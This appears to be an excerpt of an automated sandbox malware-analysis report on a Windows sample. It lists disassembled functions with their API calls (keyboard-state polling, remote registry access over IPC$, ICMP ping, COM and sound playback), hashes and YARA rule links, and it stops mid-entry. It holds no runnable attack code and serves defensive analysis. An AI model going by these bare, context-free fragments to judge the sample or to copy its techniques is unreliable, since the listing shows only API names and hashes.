                                                                                • Instruction Fuzzy Hash: D9218770280605AFEB106F64ECA9A353B6BF756358F103425F455826E1DBB2BC50DF74
                                                                                Function 0063E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0063EA5D
                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0063EA73
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0063EA84
                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0063EA96
                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0063EAA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: SendString$_wcslen
                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                • API String ID: 2420728520-1007645807
                                                                                • Opcode ID: 195235399f950cd644a8c1e1d4b993336506521721ee3e19b5bfeb484eac08e1
                                                                                • Instruction ID: c87eea955759dd34d751e49ef8539c1f4444fee68456355d9d768312b2bfc6bd
                                                                                • Opcode Fuzzy Hash: 195235399f950cd644a8c1e1d4b993336506521721ee3e19b5bfeb484eac08e1
                                                                                • Instruction Fuzzy Hash: 06117331A9036A79DB20A7A6DD4AEFF6E7DFBD1B40F01042AB411A21D1EEB05D05C5B1
                                                                                Function 005E8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E8BE8,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 005E8FC5
                                                                                • DestroyWindow.USER32(?), ref: 005E8C81
                                                                                • KillTimer.USER32(00000000,?,?,?,?,005E8BBA,00000000,?), ref: 005E8D1B
                                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00626973
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 006269A1
                                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 006269B8
                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005E8BBA,00000000), ref: 006269D4
                                                                                • DeleteObject.GDI32(00000000), ref: 006269E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: 1299260aad6e50dd365dd51d28b0e76bb1de7c63465779cc3b430b9a7832392f
                                                                                • Instruction ID: fa8a424010f92bf94625f5763aaeda49e756d286cd33ccc23dbb5f47240d54e5
                                                                                • Opcode Fuzzy Hash: 1299260aad6e50dd365dd51d28b0e76bb1de7c63465779cc3b430b9a7832392f
                                                                                • Instruction Fuzzy Hash: 96619130502A51DFCB299F15D948B767BF2FB42311F145919E0CA9E660CB71BC80DF90
                                                                                Function 005E9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9944: GetWindowLongW.USER32(?,000000EB), ref: 005E9952
                                                                                • GetSysColor.USER32(0000000F), ref: 005E9862
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: ed5bee598cb7093d468bf59b62fdb5e58ebda4977f9204fb0f01d918bc6323c4
                                                                                • Instruction ID: 5f0eccb55afdd49c73ea71b3b2e18f3dc1a3c6eec349a0074481036037e357bc
                                                                                • Opcode Fuzzy Hash: ed5bee598cb7093d468bf59b62fdb5e58ebda4977f9204fb0f01d918bc6323c4
                                                                                • Instruction Fuzzy Hash: 6641D031108A90AFDB245F399C88BB97BA6BB17330F145615F9E28B2F2C7709C42DB51
                                                                                Function 00608D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ._
                                                                                • API String ID: 0-1383207595
                                                                                • Opcode ID: c6046da74ee32863bad3a33c0f03fcb4a48ad124705ae8c501155ea5c34e6372
                                                                                • Instruction ID: 1bc72fd4f94b1963cc535db4c2a95a361662a8a41649221d6c4421be916310c1
                                                                                • Opcode Fuzzy Hash: c6046da74ee32863bad3a33c0f03fcb4a48ad124705ae8c501155ea5c34e6372
                                                                                • Instruction Fuzzy Hash: C0C1F27494424A9FDB19EFA8C844BEEBBB3BF4A310F044099E955A73D2C7349941CB70
                                                                                Function 006396E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0061F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00639717
                                                                                • LoadStringW.USER32(00000000,?,0061F7F8,00000001), ref: 00639720
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0061F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00639742
                                                                                • LoadStringW.USER32(00000000,?,0061F7F8,00000001), ref: 00639745
                                                                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00639866
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                • API String ID: 747408836-2268648507
                                                                                • Opcode ID: 5828af9b1a7394cbff7f5b2cbb1dc24a81d49677af25b149ce1c15bbe75889a9
                                                                                • Instruction ID: 5d55f9f25c88d84af912bc4ef2c077a8fae9106387a3cceb7d2ed8518f08cd90
                                                                                • Opcode Fuzzy Hash: 5828af9b1a7394cbff7f5b2cbb1dc24a81d49677af25b149ce1c15bbe75889a9
                                                                                • Instruction Fuzzy Hash: 1D41507290020AAADF14EBE4DE4ADEE7B79AF95740F100426F101B2191EA756F49CFA1
                                                                                Function 006306DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006307A2
                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006307BE
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006307DA
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00630804
                                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0063082C
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00630837
                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0063083C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                • API String ID: 323675364-22481851
                                                                                • Opcode ID: 7b03e52151ff13ec20abf16daec52e6b4b2053f514f2baabd3bdcbf9de74e1b2
                                                                                • Instruction ID: d7efc9aa40a2554b778dfce0577433214c049fc89ee7dce00d7e17342361b4dd
                                                                                • Opcode Fuzzy Hash: 7b03e52151ff13ec20abf16daec52e6b4b2053f514f2baabd3bdcbf9de74e1b2
                                                                                • Instruction Fuzzy Hash: 5D411D71C10229ABDF21EF98DC99DEDBB79FF44750F14416AE901A3261EB709E04CB90
                                                                                Function 00653C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00653C5C
                                                                                • CoInitialize.OLE32(00000000), ref: 00653C8A
                                                                                • CoUninitialize.OLE32 ref: 00653C94
                                                                                • _wcslen.LIBCMT ref: 00653D2D
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00653DB1
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00653ED5
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00653F0E
                                                                                • CoGetObject.OLE32(?,00000000,0066FB98,?), ref: 00653F2D
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00653F40
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00653FC4
                                                                                • VariantClear.OLEAUT32(?), ref: 00653FD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                • String ID:
                                                                                • API String ID: 429561992-0
                                                                                • Opcode ID: e09a86eb05eba53ebefbf49462dd3f29b209308a4595083592f206f992157ba3
                                                                                • Instruction ID: f3279b7ea6d2b34149e2c4aae29f0e3c88a5b5e1db50e6a82c2fb60223ce9937
                                                                                • Opcode Fuzzy Hash: e09a86eb05eba53ebefbf49462dd3f29b209308a4595083592f206f992157ba3
                                                                                • Instruction Fuzzy Hash: A4C124716082159FD710DF68C88496BBBEAFF89B85F00491EF9899B310DB71ED09CB52
                                                                                Function 00647A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 00647AF3
                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00647B8F
                                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00647BA3
                                                                                • CoCreateInstance.OLE32(0066FD08,00000000,00000001,00696E6C,?), ref: 00647BEF
                                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00647C74
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 00647CCC
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00647D57
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00647D7A
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00647D81
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00647DD6
                                                                                • CoUninitialize.OLE32 ref: 00647DDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2762341140-0
                                                                                • Opcode ID: 3570a2e4f9f95c0a9f176dc87ff161083de5da56f841540cc7dae6a1de3436b3
                                                                                • Instruction ID: 57e7c121dc91bd78a6fb06850a4ec7e7e7511043d99757078594753bc4d2ce0b
                                                                                • Opcode Fuzzy Hash: 3570a2e4f9f95c0a9f176dc87ff161083de5da56f841540cc7dae6a1de3436b3
                                                                                • Instruction Fuzzy Hash: 1FC11C75A04119AFDB14DFA4C888DAEBBFAFF48314B148499E819DB361DB30ED45CB90
                                                                                Function 0066541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00665504
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00665515
                                                                                • CharNextW.USER32(00000158), ref: 00665544
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00665585
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0066559B
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006655AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CharNext
                                                                                • String ID:
                                                                                • API String ID: 1350042424-0
                                                                                • Opcode ID: 1688b3c95332405e2ecc8b66d3efe8495175d15ace4014b205ed329e4f86addf
                                                                                • Instruction ID: e20b3f57d98ed2998ffe611bc43772205214bcb5c600b6ad5f5a729ec3a2ca8a
                                                                                • Opcode Fuzzy Hash: 1688b3c95332405e2ecc8b66d3efe8495175d15ace4014b205ed329e4f86addf
                                                                                • Instruction Fuzzy Hash: CC618030900609EFDF109F64CC869FE7BBBEF06724F104149F966AB290DB749A81DB61
                                                                                Function 0062FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0062FAAF
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 0062FB08
                                                                                • VariantInit.OLEAUT32(?), ref: 0062FB1A
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0062FB3A
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0062FB8D
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0062FBA1
                                                                                • VariantClear.OLEAUT32(?), ref: 0062FBB6
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 0062FBC3
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0062FBCC
                                                                                • VariantClear.OLEAUT32(?), ref: 0062FBDE
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0062FBE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: fadf3d4fadf97bf6e37b56ba335fa938d47199e9a3f1ba8368acf47878041347
                                                                                • Instruction ID: 07121b445461c080848b0c5d7805c651d129eedea14313d86a3750e718707440
                                                                                • Opcode Fuzzy Hash: fadf3d4fadf97bf6e37b56ba335fa938d47199e9a3f1ba8368acf47878041347
                                                                                • Instruction Fuzzy Hash: E7413E35A00619EFCB00DF68D8589EEBBBAFF48355F008079E945A7261CB70A945CFA0
                                                                                Function 00639C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00639CA1
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00639D22
                                                                                • GetKeyState.USER32(000000A0), ref: 00639D3D
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00639D57
                                                                                • GetKeyState.USER32(000000A1), ref: 00639D6C
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00639D84
                                                                                • GetKeyState.USER32(00000011), ref: 00639D96
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00639DAE
                                                                                • GetKeyState.USER32(00000012), ref: 00639DC0
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00639DD8
                                                                                • GetKeyState.USER32(0000005B), ref: 00639DEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 0b02bc90c1b0209ecabbceb4943271fb4eabe0ddd0cb61155f1719cd0e756690
                                                                                • Instruction ID: e110bc05ed279140b97dd4f8590073aa9db2726244df16d6b0aafccc5dec67f0
                                                                                • Opcode Fuzzy Hash: 0b02bc90c1b0209ecabbceb4943271fb4eabe0ddd0cb61155f1719cd0e756690
                                                                                • Instruction Fuzzy Hash: 9541C434904BCA6DFF30966488053F6BEA2AF11344F04905ADAC6567C2DBE499C8CFF2
                                                                                Function 0065055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 006505BC
                                                                                • inet_addr.WSOCK32(?), ref: 0065061C
                                                                                • gethostbyname.WSOCK32(?), ref: 00650628
                                                                                • IcmpCreateFile.IPHLPAPI ref: 00650636
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006506C6
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006506E5
                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 006507B9
                                                                                • WSACleanup.WSOCK32 ref: 006507BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: feceaba10f9407e8dbfccbf1974d615bced1f52e0c0ece8803f9cf1c15d6e7cd
                                                                                • Instruction ID: a5a1834051eca0195311beacea884334cf6ec887432b3e44d618d0ed672cdb96
                                                                                • Opcode Fuzzy Hash: feceaba10f9407e8dbfccbf1974d615bced1f52e0c0ece8803f9cf1c15d6e7cd
                                                                                • Instruction Fuzzy Hash: E3918F755042029FE320DF15C588F56BBE2BF88318F1485A9F8A98B7A2D770ED49CF81
                                                                                Function 00658CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 707087890-567219261
                                                                                • Opcode ID: 8640879aa67072bdad1e666cb4e3611b9a5c8228e64d20bf1ca5e20c4f1d3b70
                                                                                • Instruction ID: 0671e84c3531e38ab7b0cf08ddc4449313f2e259df9819b7a2ae9b091bd4cf26
                                                                                • Opcode Fuzzy Hash: 8640879aa67072bdad1e666cb4e3611b9a5c8228e64d20bf1ca5e20c4f1d3b70
                                                                                • Instruction Fuzzy Hash: 23519D31A001169ECB24DF68C9418FEB7B6BFA4721B20422AE866F7784DB35DD458B90
                                                                                Function 0065372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32 ref: 00653774
                                                                                • CoUninitialize.OLE32 ref: 0065377F
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,0066FB78,?), ref: 006537D9
                                                                                • IIDFromString.OLE32(?,?), ref: 0065384C
                                                                                • VariantInit.OLEAUT32(?), ref: 006538E4
                                                                                • VariantClear.OLEAUT32(?), ref: 00653936
                                                                                Strings
                                                                                Memory Dump Source
